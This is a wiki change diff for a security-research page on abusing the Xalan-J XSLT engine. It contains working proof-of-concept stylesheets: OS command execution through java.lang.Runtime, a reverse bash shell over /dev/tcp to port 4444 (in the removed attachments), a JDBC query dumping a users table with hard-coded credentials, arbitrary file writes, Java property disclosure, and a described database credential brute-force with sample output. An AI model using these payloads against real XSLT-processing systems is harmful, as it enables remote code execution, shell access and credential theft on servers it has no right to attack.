Changes for page Engine_XalanJ
on 2012/01/12 22:13
on 2012/01/11 22:36
Summary
-
Page properties (1 modified, 0 added, 0 removed)
-
Attachments (0 modified, 0 added, 7 removed)
Details
- Page properties
-
- Content
-
... ... @@ -19,67 +19,36 @@ 19 19 20 20 == Special features == 21 21 22 -* Java properties disclosure 23 -* Java environment disclosure 24 -* Java code execution 25 -* OS command execution 26 26 * File creation 23 +* Code execution 27 27 * JDBC connectivity 25 +* Java properties disclosure 26 +* Java environment disclosure 28 28 29 -== Java properties disclosure==28 +== CheckEnv() == 30 30 31 -The xsl:system-property()standardfunction canbe calledwithnonstandardarguments, mappedtoJavaproperties. In thisexample,thenameoftheJava propertiesis storedinaseparateXMLfile([[properties.xml>>attach:properties.xml]]).The XSLT code will,for eachproperty,display its nameand itsvalue.30 +The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]), associated to the Xalan namespace, will display some information about the execution context (packages, paths, versions, ...). The output of the execution of [[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]] is [[attached>>attach:xalanj-checkenv-output.txt]]. 32 32 33 -|=Namespace|=Function|=PoC|=Sample output 34 -|http:~/~/www.w3.org/1999/XSL/Transform|system-property()|[[xalanj-java-properties.xsl>>attach:xalanj-java-properties.xsl]]|[[xalanj-java-properties-output.txt>>attach:xalanj-java-properties-output.txt]] 35 - 36 -== Java environment disclosure == 37 - 38 -The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (including available packages, paths, versions, ...). 39 - 40 -|=Namespace|=Extension function|=PoC|=Sample output 41 -|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]] 42 - 43 43 == Java code execution == 44 44 45 -The attachedcode will display the current dateusing a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.34 +The following code will display the current date : 46 46 47 -|=Namespace|=Extension function|=PoC|=Sample output 48 -|http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date: 49 -Wed Jan 11 22:45:07 CET 2012 36 +TODO 50 50 51 -== OScommandexecution ==38 +== Execution of external commands == 52 52 53 - OnceJava code execution is possible, it is trivialtoexecute arbitraryOScommands using thejava.lang.Runtime class. The attached PoCwillnot read theoutputoftheexecuted command(because loops are hard in XSLT). But thisis nota problemif a reverse-shellhave already been started, isn't it ;-)40 +The following code will execute the command "touch /tmp/hello" : 54 54 55 -|=Namespace|=Extension functions|=PoC 56 -|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]] 57 - 58 -__Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]]. 59 - 60 -== File creation == 61 - 62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. 63 - 64 -|=Namespace|=Extension element|=Parameter|=PoC 65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]] 66 - 67 -== JDBC connectivity == 68 - 69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result. 70 - 71 -|=Namespace|=Extension function|=PoC 72 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] 73 - 74 -=== Brute-force === 75 - 76 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-). 77 - 78 - 79 -Here's the output when launched from the CLI : 80 - 81 -##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null 82 -Username : [root] / Password : [] : 83 -Username : [root] / Password : [uberpasswd] : 84 -Username : [root] / Password : [cnam] : OK !! 85 -Username : [pma] / Password : [pma] : ## 42 +<?xml version="1.0"?> 43 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" 44 + xmlns:j="http:~/~/xml.apache.org/xalan/java" 45 + exclude-result-prefixes="j" 46 + version="1.0"> 47 + <xsl:template match="/"> 48 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> 49 + <xsl:variable name="a" select="j:split($c, ' = ')"/> 50 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> 51 + <xsl:variable name="p" select="j:exec($r, $a )"/> 52 + No content at the moment ... 53 + </xsl:template> 54 +</xsl:stylesheet>
- properties.xml
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -2.7 KB - Content
-
... ... @@ -1,73 +1,0 @@ 1 -<properties> 2 -<property>awt.toolkit</property> 3 -<property>browser</property> 4 -<property>browser.vendor</property> 5 -<property>browser.version</property> 6 -<property>file.encoding</property> 7 -<property>file.encoding.pkg</property> 8 -<property>file.separator</property> 9 -<property>file.separator.applet</property> 10 -<property>http.agent</property> 11 -<property>java.awt.graphicsenv</property> 12 -<property>java.awt.printerjob</property> 13 -<property>java.class.path</property> 14 -<property>java.class.version</property> 15 -<property>java.class.version.applet</property> 16 -<property>java.endorsed.dirs</property> 17 -<property>java.ext.dirs</property> 18 -<property>java.home</property> 19 -<property>java.io.tmpdir</property> 20 -<property>java.library.path</property> 21 -<property>java.runtime.name</property> 22 -<property>java.runtime.version</property> 23 -<property>java.specification.name</property> 24 -<property>java.specification.vendor</property> 25 -<property>java.specification.version</property> 26 -<property>java.vendor</property> 27 -<property>java.vendor.applet</property> 28 -<property>java.vendor.url</property> 29 -<property>java.vendor.url.applet</property> 30 -<property>java.vendor.url.bug</property> 31 -<property>java.version</property> 32 -<property>java.version.applet</property> 33 -<property>java.vm.info</property> 34 -<property>java.vm.name</property> 35 -<property>java.vm.specification.name</property> 36 -<property>java.vm.specification.vendor</property> 37 -<property>java.vm.specification.version</property> 38 -<property>java.vm.vendor</property> 39 -<property>java.vm.version</property> 40 -<property>javax.accessibility.assistive_technologies</property> 41 -<property>line.separator</property> 42 -<property>line.separator.applet</property> 43 -<property>os.arch</property> 44 -<property>os.arch.applet</property> 45 -<property>os.name</property> 46 -<property>os.name.applet</property> 47 -<property>os.version</property> 48 -<property>os.version.applet</property> 49 -<property>package.restrict.definition.java</property> 50 -<property>package.restrict.definition.sun</property> 51 -<property>path.separator</property> 52 -<property>path.separator.applet</property> 53 -<property>sun.arch.data.model</property> 54 -<property>sun.boot.class.path</property> 55 -<property>sun.boot.library.path</property> 56 -<property>sun.cpu.endian</property> 57 -<property>sun.cpu.isalist</property> 58 -<property>sun.desktop</property> 59 -<property>sun.io.unicode.encoding</property> 60 -<property>sun.java.launcher</property> 61 -<property>sun.jnu.encoding</property> 62 -<property>sun.management.compiler</property> 63 -<property>sun.os.patch.level</property> 64 -<property>user.country</property> 65 -<property>user.dir</property> 66 -<property>user.home</property> 67 -<property>user.language</property> 68 -<property>user.name</property> 69 -<property>user.timezone</property> 70 -<property>user.variant</property> 71 -<property>user.zoneinfo.dir</property> 72 -</properties> 73 -
- xalanj-java-date.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -409 bytes - Content
-
... ... @@ -1,11 +1,0 @@ 1 -<xsl:stylesheet version="1.0" 2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 3 - xmlns:date="http://xml.apache.org/xalan/java/java.util.Date" 4 - exclude-result-prefixes="date"> 5 - <xsl:output method="text"/> 6 - <xsl:template match="/"> 7 - <xsl:variable name="dateObject" select="date:new()"/> 8 - <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/> 9 - </xsl:template> 10 -</xsl:stylesheet> 11 -
- xalanj-java-properties-output.txt
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -2.8 KB - Content
-
... ... @@ -1,73 +1,0 @@ 1 -<?xml version="1.0" encoding="UTF-8"?> 2 -awt.toolkit: 3 -browser: 4 -browser.vendor: 5 -browser.version: 6 -file.encoding: UTF-8 7 -file.encoding.pkg: sun.io 8 -file.separator: / 9 -file.separator.applet: 10 -http.agent: 11 -java.awt.graphicsenv: sun.awt.X11GraphicsEnvironment 12 -java.awt.printerjob: sun.print.PSPrinterJob 13 -java.class.path: /usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar 14 -java.class.version: 50.0 15 -java.class.version.applet: 16 -java.endorsed.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/endorsed 17 -java.ext.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext 18 -java.home: /usr/lib/jvm/java-6-sun-1.6.0.26/jre 19 -java.io.tmpdir: /tmp 20 -java.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386/client:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib 21 -java.runtime.name: Java(TM) SE Runtime Environment 22 -java.runtime.version: 1.6.0_26-b03 23 -java.specification.name: Java Platform API Specification 24 -java.specification.vendor: Sun Microsystems Inc. 25 -java.specification.version: 1.6 26 -java.vendor: Sun Microsystems Inc. 27 -java.vendor.applet: 28 -java.vendor.url: http://java.sun.com/ 29 -java.vendor.url.applet: 30 -java.vendor.url.bug: http://java.sun.com/cgi-bin/bugreport.cgi 31 -java.version: 1.6.0_26 32 -java.version.applet: 33 -java.vm.info: mixed mode, sharing 34 -java.vm.name: Java HotSpot(TM) Client VM 35 -java.vm.specification.name: Java Virtual Machine Specification 36 -java.vm.specification.vendor: Sun Microsystems Inc. 37 -java.vm.specification.version: 1.0 38 -java.vm.vendor: Sun Microsystems Inc. 39 -java.vm.version: 20.1-b02 40 -javax.accessibility.assistive_technologies: 41 -line.separator: 42 - 43 -line.separator.applet: 44 -os.arch: i386 45 -os.arch.applet: 46 -os.name: Linux 47 -os.name.applet: 48 -os.version: 2.6.32-37-generic 49 -os.version.applet: 50 -package.restrict.definition.java: 51 -package.restrict.definition.sun: 52 -path.separator: : 53 -path.separator.applet: 54 -sun.arch.data.model: 32 55 -sun.boot.class.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes 56 -sun.boot.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386 57 -sun.cpu.endian: little 58 -sun.cpu.isalist: 59 -sun.desktop: gnome 60 -sun.io.unicode.encoding: UnicodeLittle 61 -sun.java.launcher: SUN_STANDARD 62 -sun.jnu.encoding: UTF-8 63 -sun.management.compiler: HotSpot Client Compiler 64 -sun.os.patch.level: unknown 65 -user.country: FR 66 -user.dir: /home/bob/foobar 67 -user.home: /home/bob 68 -user.language: fr 69 -user.name: bob 70 -user.timezone: 71 -user.variant: 72 -user.zoneinfo.dir: 73 -
- xalanj-java-properties.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -276 bytes - Content
-
... ... @@ -1,7 +1,0 @@ 1 -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > 2 - <xsl:template match="//property"> 3 - <xsl:variable name="p" select="text()"/> 4 - <xsl:value-of select="$p"/>: <xsl:value-of select="system-property($p)"/> 5 - </xsl:template> 6 -</xsl:stylesheet> 7 -
- xalanj-jdbc-query.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -848 bytes - Content
-
... ... @@ -1,22 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:sql="org.apache.xalan.lib.sql.XConnection" 3 - extension-element-prefixes="sql" 4 - version="1.0"> 5 - 6 -<xsl:output method="xml" indent="yes"/> 7 - 8 -<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/> 9 -<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/> 10 -<xsl:param name="user" select="'root'"/> 11 -<xsl:param name="pass" select="'14m31337'"/> 12 -<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/> 13 - 14 -<xsl:template match="/"> 15 - <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/> 16 - <xsl:variable name="table" select='sql:query($dbh, $query)'/> 17 - <xsl:copy-of select="$table" /> 18 - <xsl:value-of select="sql:close($db)"/> 19 -</xsl:template> 20 - 21 -</xsl:stylesheet> 22 -
- xalanj-reverse-bash.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -1002 bytes - Content
-
... ... @@ -1,31 +1,0 @@ 1 -<xsl:stylesheet 2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 3 - xmlns:jv="http://xml.apache.org/xalan/java" 4 - exclude-result-prefixes="jv" 5 - version="1.0"> 6 - 7 - <xsl:template match="/"> 8 - 9 - <xsl:variable name="test"><![CDATA[/bin/bash ==== -c ==== /bin/bash 7<>/dev/tcp/127.0.0.1/4444 <&7 >&7]]></xsl:variable> 10 - <xsl:variable name="a" select="jv:split($test, ' ==== ')"/> 11 - <xsl:variable name="rtobject" select="jv:java.lang.Runtime.getRuntime()"/> 12 - <xsl:variable name="process" select="jv:exec($rtobject, $a )"/> 13 - 14 -Objet "String" : 15 - <xsl:value-of select="$test"/> 16 - 17 -Objet "Array" : 18 - <xsl:variable name="aAsString" select="jv:toString($a)"/> 19 - <xsl:value-of select="$aAsString"/> 20 - 21 -Objet "Runtime" : 22 - <xsl:variable name="rtobjectAsString" select="jv:toString($rtobject)"/> 23 - <xsl:value-of select="$rtobjectAsString"/> 24 - 25 -Objet "Process" : 26 - <xsl:variable name="processAsString" select="jv:toString($process)"/> 27 - <xsl:value-of select="$processAsString"/> 28 - 29 - </xsl:template> 30 -</xsl:stylesheet> 31 -
- xalanj-write.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -373 bytes - Content
-
... ... @@ -1,13 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:redir="http://xml.apache.org/xalan/redirect" 3 - extension-element-prefixes="redir" 4 - version='1.0'> 5 - 6 - <xsl:template match="/"> 7 - <redir:write file="/tmp/created_by_xalanj_write" method="text"> 8 - <xsl:text>Just a PoC</xsl:text> 9 - </redir:write> 10 - </xsl:template> 11 - 12 -</xsl:stylesheet> 13 -